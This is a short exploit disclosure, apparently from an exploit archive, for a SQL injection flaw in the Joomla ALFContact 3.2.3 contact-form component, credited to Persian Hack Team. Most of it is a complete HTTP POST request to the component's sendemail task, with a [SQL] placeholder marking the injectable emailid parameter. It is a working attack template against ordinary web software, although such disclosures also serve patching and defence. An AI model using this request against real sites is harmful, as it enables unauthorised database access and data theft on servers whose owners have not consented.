Joomla ALFContact 3.2.3 SQL Injection

`# Exploit Title: Joomla Component ALFContact 3.2.3 - SQL Injection  
# Date: 2017-03-13  
# Home : https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/alfcontact/  
# Exploit Author: Persian Hack Team  
# Discovered by : Mojtaba MobhaM ([email protected])  
# Home : http://persian-team.ir/  
# Telegram Channel AND Demo: @PersianHackTeam  
# Tested on: WIN  
  
# POC :  
# POST emailid Parameter Vulnerable to SQL Injection  
  
POST /index.php?option=com_alfcontact&Itemid=3 HTTP/1.1  
Host: www.server.org  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://server.org/index.php?option=com_alfcontact&Itemid=3  
Cookie: 9f0b0f9a1f03c09253698b5dbb6bc05b=12kcsjt6ocndthnghq5k13sgp4  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
name=asdsd&email=admin%40classifieds.com&emailid=[SQL]&subject=dsa&message=ads&extravalue=&task=sendemail&option=com_alfcontact  
  
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members  
# Iranian white hat Hackers  
  
  
`